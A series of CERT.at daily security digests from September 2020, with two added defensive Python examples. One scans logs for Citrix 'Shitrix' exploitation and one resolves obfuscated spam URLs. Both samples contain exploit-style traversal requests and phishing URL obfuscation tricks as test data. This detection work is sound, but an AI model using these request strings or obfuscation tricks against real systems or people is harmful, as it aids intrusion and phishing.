---------------------------------------------
The Maze ransomware operators have adopted a tactic previously used by the Ragnar Locker gang: encrypting a computer from within a virtual machine.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts…
∗∗∗ Microsoft removes Windows Defender ability after security concerns ∗∗∗
---------------------------------------------
Microsoft has removed the ability to download files using Windows Defender after it was demonstrated how it could be used by attackers to download malware onto a computer.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-removes-windows-d…
∗∗∗ Mozi Botnet Accounts for Majority of IoT Traffic ∗∗∗
---------------------------------------------
Mozi’s spike comes amid a huge increase in overall IoT botnet activity.
---------------------------------------------
https://threatpost.com/mozi-botnet-majority-iot-traffic/159337/
∗∗∗ Ransomware attacks as a consequence of Shitrix ∗∗∗
---------------------------------------------
Months after the critical vulnerability in Citrix Application Delivery Controller (ADC) and NetScaler Gateway (CVE-2019-19781, also known as "Shitrix") surfaced, more and more cases are becoming known in which the flaw was exploited very early on but only monetised much later, or is being monetised only now.
---------------------------------------------
https://www.hisolutions.com/detail/ransomware-angriffe-als-folge-von-shitrix
∗∗∗ Identity theft: these are the most common scams ∗∗∗
---------------------------------------------
Copies of ID documents and other people's identities are sought-after goods in cybercrime, because they let criminals commit offences under a false name while remaining undetected themselves.
---------------------------------------------
https://www.watchlist-internet.at/news/identitaetsdiebstahl-das-sind-die-ga…
=====================
= Vulnerabilities =
=====================
∗∗∗ Backdoors discovered in video encoders on Huawei chips, origin unknown ∗∗∗
---------------------------------------------
A security researcher has come across several critical vulnerabilities that leave hardware video encoders open to attack.
---------------------------------------------
https://heise.de/-4905641
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (chromium and netbeans), Oracle (mysql:8.0 and thunderbird), SUSE (rubygem-rack and samba), and Ubuntu (apng2gif, gnupg2, libemail-address-list-perl, libproxy, pulseaudio, pure-ftpd, samba, and xawtv).
---------------------------------------------
https://lwn.net/Articles/831853/
∗∗∗ Cisco Content Security Management Appliance and Cisco Email Security Appliance Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Security Bulletin: IBM OpenPages with Watson has addressed a Cross-Site Scripting (XSS) vulnerability (CVE-2020-4443) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-openpages-with-watson…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affect Financial Transaction Manager for Digital Payments (CVE-2020-2654) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to an information exposure vulnerability (CVE-2020-4643) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser…
∗∗∗ Security Bulletin: IBM OpenPages with Watson has addressed a reverse tabnabbing vulnerability (CVE-2020-4440) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-openpages-with-watson…
∗∗∗ Pivotal spring-boot: Vulnerability allows bypassing security controls ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0911
∗∗∗ Atlassian Jira Software: Vulnerability allows disclosure of information ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0910
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 16-09-2020 18:00 − Donnerstag 17-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Cyber attack on Düsseldorf University Hospital: BSI warns of active exploitation of a known vulnerability ∗∗∗
---------------------------------------------
On 10 September 2020 an IT security incident occurred at Düsseldorf University Hospital (UKD). As required by the BSI Act, the UKD informed the Federal Office for Information Security (BSI) about the incident. [...]
In this context the BSI emphatically points out that a vulnerability in Citrix VPN products known since January 2020 (CVE-2019-19781) is currently being exploited for cyber attacks. The BSI is becoming aware of a growing number of incidents in which Citrix systems had already been compromised before the security updates made available in January 2020 were installed. As a result, attackers retain access to the system and the networks behind it even after the vulnerability has been closed. This possibility is currently being exploited more and more to carry out attacks on affected organisations.
---------------------------------------------
https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/UKDuesseldo…
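Both the HiSolutions note on ransomware following Shitrix (above in this digest) and the BSI release make the same point: the January 2020 patch closes the hole but does not evict anyone who came through it earlier, so the only way to know is to look back at the appliance's access logs from before the patch date. The following is an added example, not code from either source. It uses the publicly documented indicator for CVE-2019-19781, a request path that traverses from /vpn/ into /vpns/ (plain or percent-encoded), and counts a POST to a Perl script under /vpns/portal/scripts/ as the exploitation stage rather than a mere probe. The log lines are constructed in Apache combined format, which is what the ADC's httpaccess.log uses; the exact field layout is an assumption.

```python
"""Look back through web access logs for CVE-2019-19781 ("Shitrix") activity.

Added example, not from the BSI press release or the HiSolutions post.
Indicator: /vpn/../vpns/ traversal in the request path; a POST to a .pl under
/vpns/portal/scripts/ is treated as exploitation. Sample log is constructed
in Apache combined format (assumed layout of the ADC httpaccess.log).
"""
from __future__ import annotations

import re
from datetime import datetime
from urllib.parse import unquote

# Constructed sample log lines.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2020:03:14:07 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83 "-" "curl/7.64.0"
203.0.113.7 - - [12/Jan/2020:03:14:09 +0100] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 5 "-" "curl/7.64.0"
198.51.100.22 - - [12/Jan/2020:03:15:00 +0100] "GET /vpn/index.html HTTP/1.1" 200 1211 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Jan/2020:11:02:41 +0100] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 200 83 "-" "python-requests/2.22"
198.51.100.40 - - [14/Jan/2020:08:00:01 +0100] "GET /logon/LogonPoint/index.html HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"/vpn/\.\./vpns/", re.IGNORECASE)
EXPLOIT_RE = re.compile(r"/vpns/portal/scripts/[^/?]+\.pl", re.IGNORECASE)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def classify_request(method: str, path: str) -> str | None:
    """Return 'exploit', 'probe' or None for one request."""
    decoded = unquote(unquote(path))  # undo single and double URL-encoding
    if not TRAVERSAL_RE.search(decoded):
        return None
    if method == "POST" and EXPLOIT_RE.search(decoded):
        return "exploit"
    return "probe"


def scan(log_text: str) -> list[dict]:
    """Return one finding per log line that shows the traversal indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line; a real run would count these
        verdict = classify_request(m["method"], m["path"])
        if verdict:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "path": m["path"], "status": int(m["status"]),
                             "verdict": verdict})
    return findings


def exploited_before(findings: list[dict], patched_at: str) -> list[dict]:
    """Exploitation requests that got HTTP 200 before the patch timestamp.

    `patched_at` uses the log's own timestamp format, e.g.
    "20/Jan/2020:09:00:00 +0100". A non-empty result means the appliance
    should be treated as compromised regardless of its current patch level.
    """
    cutoff = datetime.strptime(patched_at, TS_FORMAT)
    return [f for f in findings
            if f["verdict"] == "exploit" and f["status"] == 200
            and datetime.strptime(f["ts"], TS_FORMAT) < cutoff]


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], h["verdict"], h["path"])
    print("exploited before patch:",
          bool(exploited_before(hits, "20/Jan/2020:09:00:00 +0100")))
```

A hit in `exploited_before()` is the trigger for the response the BSI is really asking for: treat the appliance as compromised, rebuild it from a clean image rather than just patching, rotate the credentials and certificates it held, and look for the attacker's follow-on activity in the networks behind it.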
∗∗∗ Evasive URLs in Spam ∗∗∗
---------------------------------------------
Cybercriminals are continuously evolving their tools, tactics, and techniques to evade spam detection systems. We recently observed some spam campaigns that heavily relied on URL obfuscation in email messages.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-url…
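The Trustwave post does not list the exact obfuscation tricks, so the ones handled here are assumed, but they are the classic set: a decoy domain in the userinfo part (`http://bank.example@evil.example/`), percent-encoded or mixed-case host names with a trailing dot, and IPv4 hosts written as a single decimal, hex or octal integer or as dotted octal, which browsers still accept through the inet_aton rules. The following is an added example (not Trustwave's code); `canonical_host()` returns what the browser actually connects to, so a mail filter can compare that rather than the raw string against its lists. The sample URLs are constructed.

```python
"""Resolve the real destination host of obfuscated URLs seen in spam.

Added example, not from the Trustwave post. Handles (assumed) tricks:
userinfo decoy, percent-encoded/mixed-case/trailing-dot hosts, and
inet_aton-style numeric hosts (decimal, hex, octal, dotted octal).
"""
from __future__ import annotations

import ipaddress
import re
from urllib.parse import unquote, urlsplit

INT_LABEL_RE = re.compile(r"^(0x[0-9a-f]+|0[0-7]+|\d+)$", re.IGNORECASE)


def _inet_aton_int(label: str) -> int:
    """Parse one component as inet_aton does: 0x.. is hex, leading 0 is octal."""
    low = label.lower()
    if low.startswith("0x"):
        return int(low[2:], 16)
    if len(low) > 1 and low.startswith("0"):
        return int(low, 8)
    return int(low, 10)


def _inet_aton(labels: list[str]) -> str:
    """Combine 1-4 numeric components into dotted-quad text; ValueError if invalid."""
    if not 1 <= len(labels) <= 4:
        raise ValueError("too many components")
    nums = [_inet_aton_int(l) for l in labels]
    value = 0
    for n in nums[:-1]:                    # leading parts are one byte each
        if n > 0xFF:
            raise ValueError("component out of range")
        value = (value << 8) | n
    remaining_bits = 8 * (5 - len(nums))   # the last part fills the rest
    if nums[-1] >= 1 << remaining_bits:
        raise ValueError("last component out of range")
    return str(ipaddress.IPv4Address((value << remaining_bits) | nums[-1]))


def canonical_host(url: str) -> str:
    """Return the host a browser would contact for `url`."""
    if "://" not in url:
        url = "http://" + url
    host = urlsplit(url).hostname or ""    # userinfo before '@' is dropped here
    host = unquote(host).strip(".").lower()
    labels = host.split(".")
    if all(INT_LABEL_RE.match(l) for l in labels):
        try:
            return _inet_aton(labels)
        except ValueError:
            pass                           # not a valid numeric host after all
    return host


def analyse(url: str) -> dict:
    """Summarise one URL for a filter: real host, any decoy, whether it hides."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = canonical_host(url)
    return {
        "url": url,
        "host": host,
        "decoy": parts.username,           # the lure shown before '@', if any
        "obfuscated": parts.username is not None or host != (parts.hostname or ""),
    }


# Constructed samples; 192.168.1.1 stands in for an attacker host.
SAMPLE_URLS = [
    "http://www.paypal.com@evil.example/login",
    "http://3232235777/verify",
    "http://0xC0A80101/verify",
    "http://0300.0250.01.01/verify",
    "http://%65vil.example/x",
    "https://EVIL.example./y",
    "https://www.example.com/safe",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(analyse(u))
```

The `obfuscated` flag alone is a useful spam feature: a legitimate sender has no reason to write its own host as a 32-bit integer or to put a bank's name in the userinfo field.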
∗∗∗ phpbash – A Terminal Emulator Web Shell ∗∗∗
---------------------------------------------
It's common for hackers to utilize post-compromise tools that contain a graphical user interface (GUI) that can be loaded in the web browser. A GUI generally makes the tool easier to use, and certainly more visually appealing than raw text. One example of web malware that uses a GUI is the family of PHP web shells such as r57.
---------------------------------------------
https://blog.sucuri.net/2020/09/phpbash-terminal-editor-web-shell.html
∗∗∗ GuLoader's VM-Exit Instruction Hammering explained ∗∗∗
---------------------------------------------
In Joe Sandbox Cloud Basic, our community version of Joe Sandbox, we often get very interesting and recent malware samples. On September 16th, 2020, we came across a new GuLoader variant (MD5: 01a54f73856cfb74a3bbba47bcec227b). GuLoader is a malware loader well known for its anti-evasion techniques.
---------------------------------------------
http://blog.joesecurity.org/2020/09/guloaders-vm-exit-instruction-hammering…
=====================
= Vulnerabilities =
=====================
∗∗∗ Malicious code via Word file: Microsoft patches Office for Mac ∗∗∗
---------------------------------------------
Microsoft has updated the macOS version of its Office suite. The updates close vulnerabilities that allow the execution of malicious code.
---------------------------------------------
https://heise.de/-4904475
∗∗∗ Apple iOS & iPadOS: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in Apple iOS and Apple iPadOS to execute arbitrary code, cause a denial of service condition, disclose information, carry out a cross-site scripting attack, bypass security controls or cause other effects.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0907
∗∗∗ Drupal: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in Drupal to carry out a cross-site scripting attack, bypass security controls and disclose information.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0906
∗∗∗ Vulnerability Spotlight: Remote code execution vulnerability Apple Safari ∗∗∗
---------------------------------------------
The Apple Safari web browser contains a remote code execution vulnerability in its Webkit feature. Specifically, an attacker could trigger a use-after-free condition in WebCore, the DOM-rendering system for Webkit used in Safari. This could give the attacker the ability to execute remote code on the victim machine.
---------------------------------------------
https://blog.talosintelligence.com/2020/09/vuln-spotlight-apple-safari-sept…
∗∗∗ High-Severity Vulnerabilities Patched in Discount Rules for WooCommerce ∗∗∗
---------------------------------------------
On August 20, 2020, the Wordfence Threat Intelligence team was made aware of several vulnerabilities that had been patched in Discount Rules for WooCommerce, a WordPress plugin installed on over 40,000 sites.
---------------------------------------------
https://www.wordfence.com/blog/2020/09/high-severity-vulnerabilities-patche…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (dotnet3.1, kernel, mbedtls, and python35), Mageia (libraw), openSUSE (mumble), SUSE (libsolv, libzypp, and perl-DBI), and Ubuntu (libdbi-perl, libphp-phpmailer, mcabber, ncmpc, openssl, openssl1.0, qemu, samba, storebackup, and util-linux).
---------------------------------------------
https://lwn.net/Articles/831720/
∗∗∗ Synology-SA-20:21 Zerologon ∗∗∗
---------------------------------------------
A vulnerability allows remote attackers to bypass security constraints via a susceptible version of Synology Directory Server.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_20_21
∗∗∗ Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update ∗∗∗
---------------------------------------------
Multiple vulnerabilities have been discovered in Citrix ADC (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO.
---------------------------------------------
https://support.citrix.com/article/CTX281474
∗∗∗ Security Bulletin: Vulnerabilities in WebSphere Application Server affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-websph…
∗∗∗ Security Bulletin: IBM Aspera Shares 1.9.14 Patch Level 1 and earlier are vulnerable to DOM XSS ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-aspera-shares-1-9-14-…
∗∗∗ Security Bulletin: Denial of service vulnerability in WebSphere Application Server Liberty (CVE-2020-4590) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-vulnera…
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 15-09-2020 18:00 − Mittwoch 16-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Malware attacks Microsoft databases ∗∗∗
---------------------------------------------
A new malware gang has made a name for itself in recent months by breaking into Microsoft SQL Server (MSSQL) databases and installing a crypto-miner.
---------------------------------------------
https://www.zdnet.de/88382758/malware-greift-microsoft-datenbanken-an/
∗∗∗ Netflix customers beware: fraudulent e-mails in circulation! ∗∗∗
---------------------------------------------
Reports of fraudulent e-mails purporting to come from Netflix are currently piling up. In these e-mails the victims are asked to update their payment information because there are supposedly problems with their bill. The mails do not come from Netflix, however, but from criminals trying to get hold of the recipients' credit card details.
---------------------------------------------
https://www.watchlist-internet.at/news/netflix-kundinnen-aufgepasst-betrueg…
∗∗∗ This security awareness training email is actually a phishing scam ∗∗∗
---------------------------------------------
A creative phishing campaign uses an email template that pretends to be a reminder to complete security awareness training from a well-known security company.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/this-security-awareness-trai…
∗∗∗ DNS security best practices: Preventing DNS hijacking, poisoning and redirection ∗∗∗
---------------------------------------------
The importance of DNS: The Domain Name System (DNS) is one of the fundamental protocols of the Internet. It provides a lookup service that converts domain names (like google.com) into IP addresses (like 192.168.0.0). While DNS has always been an important protocol, the growing use of cloud-based services has made it even more so.
---------------------------------------------
https://resources.infosecinstitute.com/dns-security-best-practices-preventi…
∗∗∗ Do Vulnerabilities Ever Get Old? Recent "Mirai" Variant Scanning for 20 Year Old Amanda Version?, (Wed, Sep 16th) ∗∗∗
---------------------------------------------
We always say how network security is changing every day. Take a long lunch, and you may miss a critical exploit. But sometimes, time appears to stand still. We just passed 1.6 Billion seconds in the Unix Epoch. Back when the Unix timestamp still had 9 digits, in the late 90s also known as "pre Y2K", one of the servers you may have used for backups was Amanda (Advanced Maryland Automatic Network Disk Archiver). Still active and alive today, back then Amanda V 2.3 was current.
---------------------------------------------
https://isc.sans.edu/diary/rss/26572
∗∗∗ The Hacker Motive: What Attackers Are Doing with Your Hacked Site ∗∗∗
---------------------------------------------
Yesterday, September 15, 2020, the Wordfence Live team covered The Hacker Motive: What Attackers Are Doing with Your Hacked Site. This companion blog post reviews the motives we discussed live during Wordfence Live and dives deeper into the minds of attackers.
---------------------------------------------
https://www.wordfence.com/blog/2020/09/the-hacker-motive-what-attackers-are…
∗∗∗ Billions of devices vulnerable to new BLESA Bluetooth security flaw ∗∗∗
---------------------------------------------
New BLESA attack goes after the often ignored Bluetooth reconnection process, unlike previous vulnerabilities, most found in the pairing operation.
---------------------------------------------
https://www.zdnet.com/article/billions-of-devices-vulnerable-to-new-blesa-b…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Content Security Management Appliance and Cisco Web Security Appliance Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the web-based management interface of Cisco AsyncOS software for Cisco Content Security Management Appliance (SMA) and Cisco Web Security Appliance (WSA) could allow an authenticated, remote attacker to access sensitive information on an affected device.
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Malicious-code vulnerabilities in Nitro Pro PDF closed ∗∗∗
---------------------------------------------
Important security updates have been released for the PDF application Nitro Pro.
---------------------------------------------
https://heise.de/-4902752
∗∗∗ IBM: Security updates available for numerous products ∗∗∗
---------------------------------------------
Since the beginning of last week, IBM has fixed a whole series of vulnerabilities across its product portfolio, including some of high to critical severity.
---------------------------------------------
https://heise.de/-4902825
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (libssh, python35, and xen), Oracle (kernel), Red Hat (librepo and mysql:8.0), SUSE (perl-DBI), and Ubuntu (Apache Log4j, Apache XML-RPC, bsdiff, libdbi-perl, luajit, milkytracker, OpenJPEG, ruby-loofah, and ruby-websocket-extensions).
---------------------------------------------
https://lwn.net/Articles/831654/
∗∗∗ Flaws in Philips Patient Monitoring Products Can Lead to Patient Data Exposure ∗∗∗
---------------------------------------------
Multiple vulnerabilities identified in Philips patient monitoring solutions could provide attackers with unauthorized access to patient data.
---------------------------------------------
https://www.securityweek.com/flaws-philips-patient-monitoring-products-can-…
∗∗∗ Security Advisory - Use-after-free Vulnerability in Some Huawei Smart Phone ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200916-…
∗∗∗ Trend Micro ServerProtect for Linux: Vulnerability allows execution of arbitrary program code with administrator privileges ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0905
∗∗∗ Node.js: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0904
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Monday 14-09-2020 18:00 − Tuesday 15-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Windows 10 'Finger' command can be abused to download or steal files ∗∗∗
---------------------------------------------
The list of native executables in Windows that can download or run malicious code keeps growing as another one has been reported recently.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-ca…
∗∗∗ Security vulnerability: Eight zeros make you Active Directory admin ∗∗∗
---------------------------------------------
The Zerologon vulnerability exploits a flaw in Netlogon and involves the number zero in a creative way, in order to change passwords.
---------------------------------------------
https://www.golem.de/news/sicherheitsluecke-mit-acht-nullen-zum-active-dire…
∗∗∗ Successful attack campaign hits online shops based on Magento 1 ∗∗∗
---------------------------------------------
Support for version 1.x of the online shop software Magento ended in June 2020. A current "Magecart" attack campaign now targets outdated shops.
---------------------------------------------
https://heise.de/-4894269
∗∗∗ Shitrix aftermath: Citrix systems with unnoticed backdoors ∗∗∗
---------------------------------------------
Backdoors have apparently been installed on Citrix ADC and NetScaler Gateways via the Shitrix vulnerability from the beginning of the year, through which ransomware can get in.
---------------------------------------------
https://heise.de/-4901590
∗∗∗ Extortion e-mails: Criminals claim to have evidence that you are cheating ∗∗∗
---------------------------------------------
Are you being blackmailed by e-mail? Does the extortionist claim to have installed a virus on your smartphone that monitors your activities? Does he supposedly have evidence showing you cheating? Is a transfer of bitcoins demanded in return for silence? Then: don't worry! This is a fraudulent e-mail that is currently being sent out en masse!
---------------------------------------------
https://www.watchlist-internet.at/news/erpressungs-e-mails-kriminelle-haett…
∗∗∗ Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits ∗∗∗
---------------------------------------------
We captured global network traffic from firewalls around the world and then analyzed the data to examine the latest network attack trends.
---------------------------------------------
https://unit42.paloaltonetworks.com/network-attack-trends/
∗∗∗ MITRE releases emulation plan for FIN6 hacking group, more to follow ∗∗∗
---------------------------------------------
New MITRE project to provide free emulation plans that mimic major threat actors in order to train and help defenders.
---------------------------------------------
https://www.zdnet.com/article/mitre-releases-emulation-plan-for-fin6-hackin…
∗∗∗ Hackers are getting more hands-on with their attacks. That's not a good sign ∗∗∗
---------------------------------------------
Both nation-state backed hackers and cyber criminals are trying to take advantage of the rise in remote working, and are getting more sophisticated in their approach.
---------------------------------------------
https://www.zdnet.com/article/hackers-are-getting-more-hands-on-with-their-…
=====================
= Vulnerabilities =
=====================
∗∗∗ MFA Bypass Bugs Opened Microsoft 365 to Attack ∗∗∗
---------------------------------------------
Vulnerabilities 'that have existed for years' in WS-Trust could be exploited to attack other services such as Azure and Visual Studio.
---------------------------------------------
https://threatpost.com/flaws-in-microsoft-365s-mfa-access-cloud-apps/159240/
∗∗∗ VMware VMSA-2020-0020 (Sep 14) ∗∗∗
---------------------------------------------
VMware Workstation, Fusion and Horizon Client updates address multiple security vulnerabilities (CVE-2020-3980, CVE-2020-3986, CVE-2020-3987, CVE-2020-3988, CVE-2020-3989, CVE-2020-3990)
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0020.html
∗∗∗ Emergency patch available for Adobe Media Encoder ∗∗∗
---------------------------------------------
Attackers could attack Adobe's Media Encoder and leak information.
---------------------------------------------
https://heise.de/-4901833
∗∗∗ Vulnerability Spotlight: Memory corruption in Google PDFium ∗∗∗
---------------------------------------------
Google Chrome's PDFium feature could be exploited by an adversary to corrupt memory and potentially execute remote code. Chrome is a popular, free web browser available on all operating systems. PDFium allows users to open PDFs inside Chrome. We recently discovered a bug that would allow an adversary to send a malicious web page to a user, and then cause out-of-bounds memory access.
---------------------------------------------
https://blog.talosintelligence.com/2020/09/vuln-spotlight-google-pdfium-sep…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (dovecot), Debian (gnome-shell and teeworlds), Mageia (libetpan and zeromq), openSUSE (libxml2), Red Hat (chromium-browser and librepo), SUSE (compat-openssl098, firefox, kernel, openssl, and shim), and Ubuntu (gupnp).
---------------------------------------------
https://lwn.net/Articles/831592/
∗∗∗ Synology-SA-20:20 Photo Station ∗∗∗
---------------------------------------------
Multiple vulnerabilities allow remote attackers to execute arbitrary code via a susceptible version of Photo Station.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_20_20
∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Java Deserialization (CVE-2020-4521) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to SQL Injection (CVE-2019-4671) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme…
∗∗∗ Security Bulletin: Docker vulnerability affects IBM Spectrum Protect Plus (CVE-2020-13401) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-docker-vulnerability-affe…
∗∗∗ Security Bulletin: Linux Kernel vulnerability affects IBM Spectrum Protect Plus (187206) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-linux-kernel-vulnerabilit…
∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to cross-site request forgery (CVE-2020-4526) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme…
∗∗∗ Security Bulletin: Directory Traversal and Execution of Arbitrary Code vulnerabilities in IBM Spectrum Protect Plus (CVE-2020-4711, CVE-2020-4703) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-directory-traversal-and-e…
∗∗∗ Security Bulletin: Cacheable HTTPS Response vulnerability in IBM Tivoli Business Service Manager (CVE-2020-4344) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cacheable-https-response-…
∗∗∗ Security Bulletin: A vulnerability in IBM Java SDK affects IBM Tivoli Business Service Manager (CVE-2020-14577) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Improper DLL loading vulnerability affecting Aspera Connect 3.9.9 and earlier ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-improper-dll-loading-vuln…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 11-09-2020 18:00 − Monday 14-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Zerologon takes over domain controllers ∗∗∗
---------------------------------------------
Unnoticed by many, Microsoft fixed last month, in August, one of the most serious flaws ever reported to the company. This problem could be abused to simply take over Windows servers running as domain controllers in corporate networks.
---------------------------------------------
https://www.zdnet.de/88382688/zerologon-uebernimmt-domain-controller/
∗∗∗ Magento stores hit by largest automated hacking attack since 2015 ∗∗∗
---------------------------------------------
In the largest automated hacking campaign against Magento sites, attackers compromised almost 2,000 online stores this weekend to steal credit cards.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/magento-stores-hit-by-larges…
∗∗∗ Creating patched binaries for pentesting purposes, (Sun, Sep 13th) ∗∗∗
---------------------------------------------
When doing pentests, the establishment of backdoors is vital to be able to carry out lateral movements in the network or to reach the stage of action on objectives. This is usually accomplished by inviting someone to click on a commonly used executable on the computer using social engineering techniques.
---------------------------------------------
https://isc.sans.edu/diary/rss/26560
∗∗∗ ModSecurity, Regular Expressions and Disputed CVE-2020-15598 ∗∗∗
---------------------------------------------
This blog post will discuss that tradeoff in the context of regular expressions in ModSecurity. It will cover an issue raised by a member of the community as a security issue (assigned CVE-2020-15598), which we disputed, and some tips for how to avoid the more problematic aspects of regular expressions in ModSecurity.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/modsecurity…
∗∗∗ New BlindSide attack uses speculative execution to bypass ASLR ∗∗∗
---------------------------------------------
New BlindSide technique abuses the CPU's internal performance-boosting feature to bypass OS security protection.
---------------------------------------------
https://www.zdnet.com/article/new-blindside-attack-uses-speculative-executi…
=====================
= Vulnerabilities =
=====================
∗∗∗ Hyland OnBase Arbitrary File Upload ∗∗∗
---------------------------------------------
Hyland OnBase allows malicious attackers to directly upload arbitrary files to the OnBase server using file upload methods. The client side sometimes restricts file types, but the server side does not, allowing attackers with direct server access to upload files of any type, including malicious files designed to compromise clients that view the data. OnBase also appears to lack the proper mechanisms to verify that files are of the type claimed and instead relies on file extensions, allowing attackers to upload malicious files whose extensions do not match the actual file type. This provides a second vector for malicious file upload and for attacking clients.
---------------------------------------------
https://cxsecurity.com/issue/WLB-2020090071
∗∗∗ WordPress Plugin Flaw Allows Attackers to Forge Emails ∗∗∗
---------------------------------------------
The high-severity flaw in the Email Subscribers & Newsletters plugin by Icegram affects more than 100,000 WordPress websites.
---------------------------------------------
https://threatpost.com/wordpress-plugin-flaw/159172/
∗∗∗ Security updates: Root vulnerability threatens Palo Alto firewalls ∗∗∗
---------------------------------------------
A critical vulnerability in the PAN-OS operating system endangers firewalls from Palo Alto.
---------------------------------------------
https://heise.de/-4892796
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
